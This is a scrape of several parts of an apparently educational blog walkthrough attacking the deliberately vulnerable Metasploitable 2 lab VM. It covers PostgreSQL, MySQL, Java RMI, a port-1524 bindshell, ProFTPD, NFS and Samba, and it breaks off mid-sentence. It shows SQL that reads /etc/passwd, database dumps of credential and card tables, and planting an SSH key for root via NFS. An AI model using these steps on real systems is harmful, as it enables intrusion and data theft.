href="https://drive.google.com/uc?id=1StkqWsURFx6PreoqpHh_bvFNuw8CM8TC" target="_blank"><img width="737" height="191" title="Running the PostgreSQL login module with default settings" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the PostgreSQL login module with default settings" src="https://drive.google.com/uc?id=1KTp09GKl-lo-n0G6S_IuojDZMalhFgFp" border="0"></a><p>Another option is to use the credentials previously found and stored in the workspace<p><a href="https://drive.google.com/uc?id=1VmME2Ty37kYNk3EsHpc4FyddcrdK9hkf" target="_blank"><img width="749" height="303" title="Running the PostgreSQL login module with custom settings" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the PostgreSQL login module with custom settings" src="https://drive.google.com/uc?id=1mHfZaTXEvkr3VYFbmWXGeGwJtKNt16gy" border="0"></a><p>In this case, the result is exactly the same.<p>Now that you have login credentials for the PostgreSQL server, use them to do admin stuff like running arbitrary SQL statements with Postgres.<p><strong><em>NOTE:</em></strong> Brute forcing the service using Hydra is exactly the same as it was done for previous services<h3>Exploiting PostgreSQL using Metasploit</h3><p>Load the auxiliary admin module to run the SQL commands<p><a href="https://drive.google.com/uc?id=12b47XI7eBYWx8pEtbUMPlKWapc9TUXny" target="_blank"><img width="837" height="190" title="The Metasploit PostgreSQL admin module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The Metasploit PostgreSQL admin module" src="https://drive.google.com/uc?id=1n5xBWqWcO1Uz4uEpeH9n36gX1-t_EXrQ" border="0"></a><p>As you can see, the default options are almost perfect. Try to get the names of the existing databases:<p><a href="https://drive.google.com/uc?id=1G7HjQHyL1Z6l1nOMybNVXQ1ZKGwRrKp6" target="_blank"><img width="832" height="174" title="Running the Metasploit PostgreSQL admin module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the Metasploit PostgreSQL admin module" src="https://drive.google.com/uc?id=1vSWoaBErfmFIkPDpQUBjJ3GRvXLttf-k" border="0"></a><p>Postgres implements its databases differently from MySQL, so to list all the databases, you need a different command then "SHOW DATABASES". For PostgreSQL, you can use the <b><em>pg_database database</em></b>.<p>The following SQL command gets names of databases from pg_database:<p><strong><em>select datname from pg_database;</em></strong><p>the following also works:<p><strong><em>select pg_database.datname from pg_database;</em></strong><p><a href="https://drive.google.com/uc?id=1on-lmCFqri4n2FrddA6Dm8VpD8DZ6WiA" target="_blank"><img width="768" height="270" title="Running the Metasploit PostgreSQL admin module with proper command" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running the Metasploit PostgreSQL admin module with proper command" src="https://drive.google.com/uc?id=18SZuK1NDsZlJ3lvfVX8vx3GrW2c_nDvd" border="0"></a><h4>Getting the /etc/passwd using PostgreSQL</h4><p>With MySQL, you were able to obtain files on the remote machine using the SQL statement <code><i>select load_file(\'/etc/passwd\')</i></code><i>.</i> However, the <code><i>load_file</i></code><code> </code>function isn't available in PostgreSQL.<p>PostgreSQL implements it as <code><b>load</b></code>:<p><strong><em>load \'/etc/passwd\'</em></strong><p><a href="https://drive.google.com/uc?id=146TQgI7kNNK1GaSfIb9NyBSi7UZg9uVK" target="_blank"><img width="828" height="133" title="Trying to read the /etc/passwd with postgres" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Trying to read the /etc/passwd with postgres" src="https://drive.google.com/uc?id=1wLfL5TZ645q2mZEcW3Uo0JFqKLJABRb-" border="0"></a><p>This has a problem; <b><em>invalid ELF header</em></b>. (Like it is trying to load a binary file...?). So, this module doesn't allow you to load files as easily as, say, MySQL. Maybe you can try a different module.<p><a href="https://drive.google.com/uc?id=1F__OrwyKBaVaaBM7niBcd6KHg-4NwHRI" target="_blank"><img width="820" height="197" title="The Metasploit PostgreSQL readfile module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The Metasploit PostgreSQL readfile module" src="https://drive.google.com/uc?id=1R6T11PzM122FV2brxN30xALd3XWcWbc9" border="0"></a><p>Again, almost perfect default options.<p><a href="https://drive.google.com/uc?id=1bXz3KMR9bhCsgbS2x9HgVGJ0esFMtPYq" target="_blank"><img width="754" height="369" title="Reading the /etc/passwd with postgres" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Reading the /etc/passwd with postgres" src="https://drive.google.com/uc?id=1xu5n7500PPhTh9rRCR1IvFBp1zUdj664" border="0"></a><p>It works perfectly, with an important bonus. Take a look at the end of the module output:<p><a href="https://drive.google.com/uc?id=11AvxXRXglllOhbDqrtJDsCUchV91bax3" target="_blank"><img width="801" height="69" title="MSF readfile module output" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="MSF readfile module output" src="https://drive.google.com/uc?id=1IIAUPUP2Pqsa_zb29mnGEy8lqDc3K73h" border="0"></a><p>The contents of the /etc/password were saved inside the workspace for later use. You can see it with the <em><b>loot</b> </em>command:<p><a href="https://drive.google.com/uc?id=1N7xLkvlszHmM2EHprXchT2myRm83QTFu" target="_blank"><img width="791" height="90" title="The MSF loot command" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="The MSF loot command" src="https://drive.google.com/uc?id=1mILND7xUSDztpktWPqLL_uXYHBhJWNWV" border="0"></a><h4>Delivering a payload with PostgreSQL</h4><p>To deliver a payload, use the payload module associated with PostgreSQL.<p><a href="https://drive.google.com/uc?id=1QhsI2mZk0cd9uRj6Qvgycy8Z_MoQSNKa" target="_blank"><img width="821" height="592" title="Delivering a payload with postgres" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Delivering a payload with postgres" src="https://drive.google.com/uc?id=1PEy0372EXHgRx1k-k2dU4P-RO10jfJXH" border="0"></a><h3>Dumping the PostgreSQL database</h3><p>To dump the contents of a PostgreSQL database, use the <code><b><em>pg_dump</em></b></code><code> </code>command.<p>You can check all the flags with <code>man pg_dump</code>, but the basic ones you will need are:<ul><li>Username</li><li>Password (does not accept password typed as an argument on command line, apparently?)</li><li>Database (one of the three above, postgres, template0, or template1)</li><li>Table (you can use wildcards to match table names)</li><li>A file to capture all the output</li></ul><p><a href="https://drive.google.com/uc?id=1WLRjfSkj0HjyH9uNrFUcH00ig67EvlNH" target="_blank"><img width="834" height="445" title="Dumping the database with pgdump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the database with pgdump" src="https://drive.google.com/uc?id=1YFxE5HPcs0KBspEzVtNHmomjAiKIKDvq" border="0"></a></p><p>Like mysqldump, pg_dump will output the SQL commands required to exactly replicate the database and tables selected.<p>However, unlike mysqldump, postgres implements an additional layer, implemented within SQL itself, that enables a lot of additional functionality. This implements all sorts of different databases and tables for PostgreSQL user management and function definitions.<p>While this represents a huge attack surface that would make malicious code difficult to find, this PostgreSQL database does not appear to be used for anything. The port is open and the server is listening, but there is no purpose. (Other than to provide Metasploitable users another route into the machine.)<p>That means that <code><strong><em>--table='*'</em></strong> </code>will dump out a lot of superfluous stuff.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-86038967240916172512020-11-04T09:02:00.000-08:002020-11-21T00:13:49.137-08:00Metasploitable 2 Walkthrough: Part VII<h2>Exploiting Port 3306 – MySQL</h2><p>MySQL is an open-source relational database management system. A relational database organizes data into one or more data tables in which data types may be related to each other.</p><p>There are several possibilities to explore when connecting to the MySQL service running on the Metasploitable 2 VM</p><h3>Blank password</h3><p>The MySQL database in Metasploitable 2 has negligible security so you can connect to it using the MySQL function of Kali by defining the username and host IP. The password will be left blank.<p><a href="https://drive.google.com/uc?id=1bi2-oTHMmkNp9p3UBxnwcKv4WdkEV8K1" target="_blank"><img width="637" height="203" title="Connecting to SQL without password" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to SQL without password" src="https://drive.google.com/uc?id=1VwovAJTiS_TcqS6lo29mWXXM60AltNzI" border="0"></a><p>Once you have root access to the database access you can do anything<h4><a name="_Toc55385838"></a></h4><a name="more"></a><h3>Brute forcing MySQL using Hydra</h3><p>Brute forcing MySQL is in its essence the same as brute forcing any other applications and therefore similar tools and techniques can be used<h5><a href="https://drive.google.com/uc?id=1uu1bpUcLri0fgMPCRLwls8ZnxqldjnMD" target="_blank"><img width="823" height="111" title="Brute forcing MySQL with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Hydra" src="https://drive.google.com/uc?id=15hhZhno9HoGwIv7O8QIyNT5gXlVomF6I" border="0"></a></h5><h5><br></h5><h3>Brute forcing MySQL using Metasploit</h3><p>Use the proper auxiliary module. Note that in order to successfully use this, you'll need some wordlists for username and password combinations. Try using a single user (root) and the <strong><em>rockyou</em></strong> list for passwords:<p><a href="https://drive.google.com/uc?id=1bAihXKR9MglvLUtCFey5EluDBdAYOAtD" target="_blank"><img width="839" height="294" title="Brute forcing MySQL with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing MySQL with Metasploit" src="https://drive.google.com/uc?id=1IgNqp0plfoipChK4QRBC7EbVEfHMcHrL" border="0"></a><p>The result is the same as before; the root account has a blank password.<h3>Exploiting My SQL using Metasploit</h3><p>Once you have credentials to connect to the MySQL server, you will want to pivot from recon mode to attack mode. This means you'll be using different exploits from MSF. Whereas the initial exploit was a scanner, the subsequent exploits will be admin exploits.<p>There are two different ways to exploit the MySQL server to obtain system information and database information. These are covered below.<p>The <code><b><em>mysql_sql</em> </b></code>auxiliary module can be used to connect to the remote database and execute SQL commands. As an example, execute SQL's <code><b><em>load_file()</em> </b></code>function to scan the contents of the <code><em><strong>/etc/passwd</strong></em> </code>file and get a list of users on the system.</p><p><a href="https://drive.google.com/uc?id=1ZrUMVaNrb4bMo34VmCOabxcGRg2_yCFD" target="_blank"><img width="770" height="975" title="Executing SQL commands with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing SQL commands with Metasploit" src="https://drive.google.com/uc?id=10H5Z_OXIVaCktjsxU56Y6s5GRrwvTsmG" border="0"></a><h3>Enumerating MySQL users with Metasploit</h3><p>This module will enumerate all of the MySQL accounts on the system and their various privileges.<p><a href="https://drive.google.com/uc?id=1YqNtV15mj9FFjnzQbp8rLs5cBfE214Fa" target="_blank"><img width="764" height="1021" title="Enumerating MySQL users with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating MySQL users with Metasploit" src="https://drive.google.com/uc?id=15Hsf-SXWQRA_aetWkOut9sHRe5mKhPuA" border="0"></a><p>Since we already have access to the root user in MySQL, there's no need to brute force other login names. However, if there were many users in a complex database, this might yield a treasure trove of usernames with different privileges, allowing you to see different sections of the database.<p>Take a look at the credentials you have stored so far:<p><a href="https://drive.google.com/uc?id=1OA0KvgwpZGOXR1FVqjFlgvWUsar56EDL" target="_blank"><img width="768" height="191" title="Credentials stored in the MSF database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Credentials stored in the MSF database" src="https://drive.google.com/uc?id=1L20pdXlHZTc0JE4lLgbCgon56myzthve" border="0"></a><h3>Dumping the MySQL database contents</h3><p>Use the <b><em>show databases</em></b> SQL command to show the databases available.<p><a href="https://drive.google.com/uc?id=1vGn-GQj0OmjrofD05f_TpZfgz5px5DDL" target="_blank"><img width="732" height="450" title="Dumping the MySQL Database contents" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the MySQL Database contents" src="https://drive.google.com/uc?id=1LTPj7-kE-OqHVd8-8fb9dmvelAY6S2zH" border="0"></a><p>Use the <b><em>use database</em></b><code><b><font face="Arial"><em>name</em></font> </b></code>SQL command to use a particular database.<p><a href="https://drive.google.com/uc?id=1Rz9VBQEllxPUfDjEuuhxueAmzAdLplKC" target="_blank"><img width="605" height="124" title="Selecting the database to use" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting the database to use" src="https://drive.google.com/uc?id=1A4Wz9o2JVscbZjWwo-X0b_DSrjb08aBn" border="0"></a><p>Once you've selected a particular database, you can start to explore it. <p><a href="https://drive.google.com/uc?id=1x8wdFSBlvngcQQlQC1ymTZ2HelSoiaJR" target="_blank"><img width="304" height="241" title="Exploring the database contents" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploring the database contents" src="https://drive.google.com/uc?id=1i9texZYoO8-BtQSE_97sMpEbwY6B4Lib" border="0"></a><p>Select a different database and explore it<p><a href="https://drive.google.com/uc?id=1IDm_HNUrI7dC10GMIDfODUizWzTlIhy0" target="_blank"><img width="709" height="389" title="Selecting and exploring a different database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting and exploring a different database" src="https://drive.google.com/uc?id=1nGRhhMG13pm_uxdxjC0L0muUos1beDrs" border="0"></a><p>You can use the <b><em>describe</em></b> command to describe the fields in each SQL table, as well as data types.<p><a href="https://drive.google.com/uc?id=1wTVyo3_iBJhW7GbdK3LmaLxNl4JzeEGk" target="_blank"><img width="711" height="287" title="Describing the accounts table" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Describing the accounts table" src="https://drive.google.com/uc?id=1mHBHSBtVK3ZS8ijpop0euhF7bt8_WGM1" border="0"></a><h4><a href="https://drive.google.com/uc?id=1mLm_P6XieAPHaaDEtCE00FfNvtvOp2RD" target="_blank"><img width="716" height="273" title="Describing the credit cards table" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Describing the credit cards table" src="https://drive.google.com/uc?id=1waj35fXeXp8Ljx5adQrMJOKiFOW-OUlI" border="0"></a></h4><h3>Dumping the MySQL database contents using mysqlshow</h3><p>You can also use <b><em>mysqlshow</em></b> to easily show the contents of the database. Use the <b><em>host</em></b> option to use a remote database.<p><a href="https://drive.google.com/uc?id=13fP4GoSKDSQCnWEiaSSFkr8fbA9bqQtZ" target="_blank"><img width="582" height="657" title="Dumping the MySQL database with mysqlshow" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the MySQL database with mysqlshow" src="https://drive.google.com/uc?id=1oxaXMWaRnEqfd4k-yJVC17F_x4_hYD2u" border="0"></a><h3>Dumping the MySQL database contents using mysqldump</h3><p>Like the mysqlshow command, the <b><em>mysqldump</em></b> command accepts the<em><strong> host</strong></em> argument. To dump a table, run the command like this:<p><strong><em># mysqldump --host=10.0.0.27 [database] [tablename]</em></strong> <p>This will result in an SQL script that will recreate the entire database from scratch. Be careful and make sure you use <code><b><font face="Arial"><em>mysqlshow –count</em></font> </b></code>before, to avoid dumping out a 500 GB database.<h4>DVWA</h4><p>Try it with the <b><em>dvwa</em></b> database:<p><a href="https://drive.google.com/uc?id=1uriMh7OqCelYiN_5cYWorH4KPBwNKb9_" target="_blank"><img width="450" height="218" title="Counting the dvwa database with mysqlshow" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Counting the dvwa database with mysqlshow" src="https://drive.google.com/uc?id=13XY45zUdJ_vVQxKhtAp5X0PqGVHYNKo-" border="0"></a><p>Unfortunately, the current version of mysqldump doesn’t work with the currently available version of Metasploitable 2. An older Kali version (2015) will work just fine and dumping the <b>dvwa</b> web app reveals some usernames and password hashes.<p><a href="https://drive.google.com/uc?id=1PPKDeIXEDhAzokJAofsN8ziV-QxaUkrf" target="_blank"><img width="709" height="139" title="Dumping the dvwa database with mysqldump" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping the dvwa database with mysqldump" src="https://drive.google.com/uc?id=1WGDvv8_gaf3jgBUTH2YIKU7ffkBG_7QJ" border="0"></a><p><a href="https://drive.google.com/uc?id=1Iz4NAqSQrm2JKMYzfNDwgjRKVEN-u5Ry" target="_blank"><img width="810" height="156" title="Table users in the dvwa database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Table users in the dvwa database" src="https://drive.google.com/uc?id=1Iddlp5TqFqoDV9Oj27Sv_PX7mX51EZAn" border="0"></a><p>From this, we can see a couple of interesting things.<p>First, we have 5 users in this web app. The password field of the table consists of strings of 33 characters, in hex. You can use <a href="https://charlesreid1.com/wiki/Hash-Identifier" target="_blank">Hash-Identifier</a><b></b><b> </b>to identify the hash. <p><a href="https://drive.google.com/uc?id=1j6RdjiIMjQ72stnUeQ_-yP5lt4aTw9rC" target="_blank"><img width="786" height="410" title="Running Hash Identifier" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Running Hash Identifier" src="https://drive.google.com/uc?id=1hAaRX5GCDp84LDEjFC9-XVIKJECKvE2g" border="0"></a><p>Looks like it is an MD5 hash. My advice; pay attention to the gathered info but don’t waste time trying to crack this.<h4>OWASP10</h4><p>The owasp10 database has some very good info too.<p>One table has plain-text passwords.<p><a href="https://drive.google.com/uc?id=1hBTtkVBLoQjKjeMsR2dAmn6tW5cBenGq" target="_blank"><img width="798" height="141" title="Table users in the owasp10 database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Table users in the owasp10 database" src="https://drive.google.com/uc?id=1N7sQly0jl97a1ukbr9hbql259qLNcOzQ" border="0"></a><p>Another has credit card details<p><a href="https://drive.google.com/uc?id=1S65z2O3NtyPIV98muDzEnn2rMB_EzUno" target="_blank"><img width="780" height="97" title="Table credit cards in the owasp10 database" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Table credit cards in the owasp10 database" src="https://drive.google.com/uc?id=1NQxfrBQrzt1IxEjfumARzeBlgiASdbHi" border="0"></a></p><p>Several other tools can be used to enumerate and exploit this MySQL database but all revolve around the same basic procedures.<p><p><a title="Metasploitable 2 Walkthrough: Part VIII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-viii.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com2tag:blogger.com,1999:blog-6396309617370994433.post-22733701214994002982020-11-04T04:51:00.000-08:002020-11-21T00:12:39.335-08:00Metasploitable 2 Walkthrough: Part VI<h2>Exploiting Port 1009 – Java RMI</h2><p>GNU Classpath is a set of essential libraries for supporting the Java programming language. The Metasploitable VM runs a remote object registry for GNU Classpath using default credentials which can be leveraged to gain a shell on the machine using the Java RMI Server Insecure Default Configuration Java Code Execution Metasploit module.<p>This exploit is quite straight forward; just choose the exploit, set the proper options and run.<p><a href="https://drive.google.com/uc?id=18m3byKNCVDU6moapW0eI8Id_DXLSbpp7" target="_blank"><img width="829" height="674" title="Exploiting Java RMI with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Java RMI with MSF" src="https://drive.google.com/uc?id=1DsLoGZyWrAgbEG0-TnihuwhylN4Gpy4T" border="0"></a><p><b>NOTE</b>: After this exploit will need to reboot the Metasploitable2 as it will go to 100% CPU.<p><b>NOTE</b>: There is another exploit available for this port (<b><em>exploit/multi/browser/java_rmi_connection_impl</em></b>) but it only creates a local listener ready to accept connections from the Metasploitable machine. It can be used in conjunction with the previous exploit or with other Java malicious implants to create persistence on the target machine.<h2><a name="_Toc50732575"></a></h2><a name="more"></a><h2>Exploiting Port 1524 – Shell</h2><p>Many attack scripts install a backdoor shell at this port.</p><h3>Exploiting Bindshell service</h3><p>Metasploitable 2 comes with an open bindshell service running on port 1524. Use Netcat to connect to it.<p><a href="https://drive.google.com/uc?id=16O5FVnyjwEDQQk02L2gQ9XbPegdRQmPb" target="_blank"><img width="508" height="151" title="Connecting to Bindshell with Netcat" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to Bindshell with Netcat" src="https://drive.google.com/uc?id=1pbQ2fZ0oe-r5AL8zXWM9uMzLSJinQuIz" border="0"></a><h3>Exploiting Ingreslock service</h3><p>Ingreslock is used legitimately to lock parts of an <strong><em>Ingres</em></strong> database. However, there are known trojans that also use port 1524 as a backdoor into a system. Some sysadmins allow this port to be open thinking it is needed.<p>This vulnerability could fall into the same group as Telnet, and rlogin, in the sense that it can be used as an unintentional backdoor. All you need to do is connect via Telnet to the port to gain access to the victim’s machine. You will be logged in with the same rights as the user in which the service is running.<p><a href="https://drive.google.com/uc?id=17esk7EWUFMC51Ogi9tgdMU2v78Y-K-Hz" target="_blank"><img width="501" height="183" title="Connecting to Ingreslock via Telnet" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to Ingreslock via Telnet" src="https://drive.google.com/uc?id=1XPU5uLtASdob_SOk61bNTXAlmjZsOXyb" border="0"></a><h2>Exploiting Port 2121 – ProFTPD</h2><h3>Telnet access</h3><p>Connect to the target machine’s port 2121 via Telnet using the default credentials for Metasploitable 2.<p><a href="https://drive.google.com/uc?id=1iBLRWvv7pQqgCWiTXmaMhjsfpaEZ1AT6" target="_blank"><img width="489" height="250" title="Connecting to ProFTPD via Telnet" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to ProFTPD via Telnet" src="https://drive.google.com/uc?id=1QNent78zXJkuwxwNoLfXUWOENSlprlFd" border="0"></a><h3>FTP access</h3><p>The FTP access can be brute forced exactly like you did for the vsFTPd running on port 21. Likewise, the connection to the ProFTPD is a normal FTP connection. Try using the “user” account:<p><a href="https://drive.google.com/uc?id=1_3TBDBewkmJm7rDwQtuX0nTP7KnpL-hf" target="_blank"><img width="722" height="459" title="Connecting to ProFTPD" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Connecting to ProFTPD" src="https://drive.google.com/uc?id=1eGc9ufnUk6V37w6NmYi0k486uUyJaspM" border="0"></a><p>From here you can GET these files and open them to extract additional info. Or you can try to login with one of the other accounts.<h2>Exploiting Port 2049 – NFS</h2><p>The Network File System is a distributed file system protocol allows a user on a client computer to access files over a network in the same way they would access a local storage file.<h3>Connecting to NFS</h3><p>Start by checking out what network services are running - use the <b>rpcinfo</b> command to do that:<p><a href="https://drive.google.com/uc?id=1ddBNYD5zn0g18EU0rh1fPtqG49dQHlBw" target="_blank"><img width="418" height="309" title="Checking out running network services" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking out running network services" src="https://drive.google.com/uc?id=1AqNTSqNXJi2j9JqS06ks6sf3ee9LabNt" border="0"></a><p>There is an NFS service listening on port 2049 and need you need to use the <b><em>showmount</em></b> command to show what file systems are mountable on this NFS.<p><a href="https://drive.google.com/uc?id=1Lj827JYnX__wiUgmaMjcAYkL0gDYlMPd" target="_blank"><img width="419" height="131" title="Checking what file systems are mountable on NFS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking what file systems are mountable on NFS" src="https://drive.google.com/uc?id=1dkF07X_B-n4sjwV9tnzaxXKTFqAXCcQo" border="0"></a><p>Yes! The entire filesystem is mountable/writable! To mount the network filesystem, you need to run the RPC service <b><em>rpcbind</em></b>. Start the service, create a temporary directory to act as a mount point, and then mount the filesystem at the IP address, with no credentials.<p><a href="https://drive.google.com/uc?id=1CxA8qzKcdvKTOWqs05mIRJiRpo9YXduJ" target="_blank"><img width="521" height="222" title="Mounting the remote file system" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Mounting the remote file system" src="https://drive.google.com/uc?id=1UvWR0KRZi2O9GA9zNTfPAsg6BNzhzlHl" border="0"></a><h3>Abusing NFS to escalate privileges</h3><p>Now you can abuse your write access to the filesystem. You can also download anything you want from the remote machine, like the shadow file to crack the passwords with John the Ripper.<p>Or you can try a different form of privilege escalation by copying an SSH key into the remote machine's trusted SSH keys, and obtain passwordless remote access. In this method, you will create an SSH key without a passphrase and exchange it with the SSH key of the victim machine for the root user.<p>You start by using <b><em>ssh-keygen</em></b> to generate an RSA keypair without a key phrase<p><a href="https://drive.google.com/uc?id=193h9FIPogph-Sy3YCCeqUKCckfqm84Od" target="_blank"><img width="663" height="339" title="Generating an RSA keypair without a key phrase" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Generating an RSA keypair without a key phrase" src="https://drive.google.com/uc?id=1m0VPA3nBQimb4Hu1EWBhAlb2TZJnv-aM" border="0"></a><p>Now you will place that key in the<strong><em> /root/.ssh</em></strong> folder where the key is found by default.<p><a href="https://drive.google.com/uc?id=1Yhq8B4V2Xz3PHzODUZPZ_ai9MU_tNN6s" target="_blank"><img width="712" height="70" title="Placing the RAS key " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Placing the RAS key " src="https://drive.google.com/uc?id=1Q3XG1IU4FqRL-eTSMVXKHY36nccJcWzX" border="0"></a><p>Don’t forget to unmount the remote file system<p><a href="https://drive.google.com/uc?id=1Ew2kcwPjqqoOa9BItmhfLpeOYgEkQ_Mc" target="_blank"><img width="290" height="71" title="Unmounting the remote file system" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Unmounting the remote file system" src="https://drive.google.com/uc?id=1PDE-8z0lmYnUzk2BfjIiONYqM0-5OatT" border="0"></a><p>Now you have SSH root access without a password!<p><a href="https://drive.google.com/uc?id=1r1ctMTYtfStWdMMrlqQOXyNX2-Y9Te2p" target="_blank"><img width="817" height="334" title="SSH root access via RSA key" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="SSH root access via RSA key" src="https://drive.google.com/uc?id=1Ppuxo3OSpAbM08GHhl1vSl0hi1C7zcWu" border="0"></a></p><p><br></p><p><p><a title="Metasploitable 2 Walkthrough: Part VII" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-2-walkthrough-part-vii.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-1499270311849863202020-11-03T15:41:00.000-08:002020-11-21T00:11:40.921-08:00Metasploitable 2 Walkthrough: Part V<h2>Exploiting Port 139 – NetBIOS Session Service, Samba</h2><p>Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. Do you remember what is the exact Samba version that is running on the Metasploitlabe2 VM? Use Nmap to refresh your memory:<p><a href="https://drive.google.com/uc?id=114nQeM-usqBAqrdJWLqOIrTY2Fm1Dx7K" target="_blank"><img width="846" height="192" title="Scanning port 139 with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Scanning port 139 with Nmap" src="https://drive.google.com/uc?id=1BEm9zV3tpNwMysHaE3LwF0hlfkOcK46c" border="0"></a><p>The vulnerability in this service takes advantage of the username map script functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access. <p>This is extremely easy, just load the Metasploit module and run it.<p><a href="https://drive.google.com/uc?id=1Vxs-GOP0eQJezThwvFX3yLSuVm7mM21L" target="_blank"><img width="834" height="203" title="Exploiting Samba with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Samba with MSF" src="https://drive.google.com/uc?id=1UNHxFEiLR03-IzqeDabxx2GjTftVWW98" border="0"></a><p><a name="more"></a><p>The default port for the previous exploit is set to port 139 but it can be changed to port 445 as well.<h2>Exploiting Port 445 – SMB, Samba</h2><p>Confirm version number with Metasploit:<p><a href="https://drive.google.com/uc?id=1krsEjb7jen8FWEAAdJSO6tQQv0K9P1Kw" target="_blank"><img width="837" height="165" title="Enumerating service at port 445 with MS" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating service at port 445 with MSF" src="https://drive.google.com/uc?id=1BFKn1g__4dgBRfXHv8utx3ORGZZLZyBb" border="0"></a><p>This version of Samba has several vulnerabilities that can be exploited. The first you will explore is the issue with “wide links” being enabled. This feature is enabled by default on older versions of Samba.<p>It can be exploited to gain access to file shares without authenticating through SMB.<h3>Exploiting SMB using smbclient</h3><p>You can use a tool called <em><b>smbclient</b> </em>to connect to the Metasploitable box, and list the available shares without having a valid username/password. Just hit enter when it asks for root’s password, and it will grant you anonymous access.<p><a href="https://drive.google.com/uc?id=1GZx-GhhWqx5382SQwCxgMeSwVifwqxfv" target="_blank"><img width="834" height="389" title="Using smbclient to get access" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using smbclient to get access" src="https://drive.google.com/uc?id=10-qgyNkfr-tpeoVSmPA-KdNUII3I6_70" border="0"></a><p><b>NOTE</b>: In the current Kali version you will need to edit the <b>/etc/samba/smb.conf</b> to get the proper results.<p><a href="https://drive.google.com/uc?id=1YYgmB9vb8EYbvVrOeNTC-W6iIK7Tie6k" target="_blank"><img width="739" height="506" title="Editing Kali's /etc/samba/smb.conf file" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Editing Kali's /etc/samba/smb.conf file" src="https://drive.google.com/uc?id=1po6QWuotYRNSLn3saL3BbiqtrmzDuVd7" border="0"></a><p>You can get even better results from <b><em>smbmap</em></b>:<p><a href="https://drive.google.com/uc?id=1U5pQ3I9JwPqOgK7Y6_evo8xsoWLIhMHH" target="_blank"><img width="776" height="145" title="Using smbmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using smbmap" src="https://drive.google.com/uc?id=1mIG4gJWpjFNrBJmGzZWVdFDA5uZpcegW" border="0"></a><p>What is really important is that you have found a possibly exploitable directory, “<b><em>tmp</em></b>”. There is an exploit for this in MSF:<p><a href="https://drive.google.com/uc?id=1Ckn5ydK4-NQBf01NO9qHJ3BOWLctpK4Q" target="_blank"><img width="776" height="287" title="Exploiting SMB with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with MSF" src="https://drive.google.com/uc?id=1PWIVNpM3e9hMTsAGIwVXdqJDYo3wzEY7" border="0"></a><p>The exploit was successful, so now you can connect again using <b><em>smbclient</em></b>, and see if you can get to the <em><b>rootfs</b> </em>dir.<p><a href="https://drive.google.com/uc?id=14EJXsmwuubPgIkvoFlGroULj7y9wmeNo" target="_blank"><img width="769" height="269" title="Accessing the rootfs directory" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Accessing the rootfs directory" src="https://drive.google.com/uc?id=1kaP8g0MG4F_1Gi5dJw39rG8vBPhsEcTq" border="0"></a><p><i></i><p>So, now you have access to browse the root file system. You could continue enumerating the machine, looking at various config files, etc., to see if we can find any other holes. Please note you don’t have full root access here, so some files/directories will not be accessible.<h2>Exploiting Ports 512, 513, 514: r-Services</h2><p>TCP ports 512, 513, and 514 are known as “<strong><em>r-services</em></strong>”, and have been misconfigured to allow remote access from 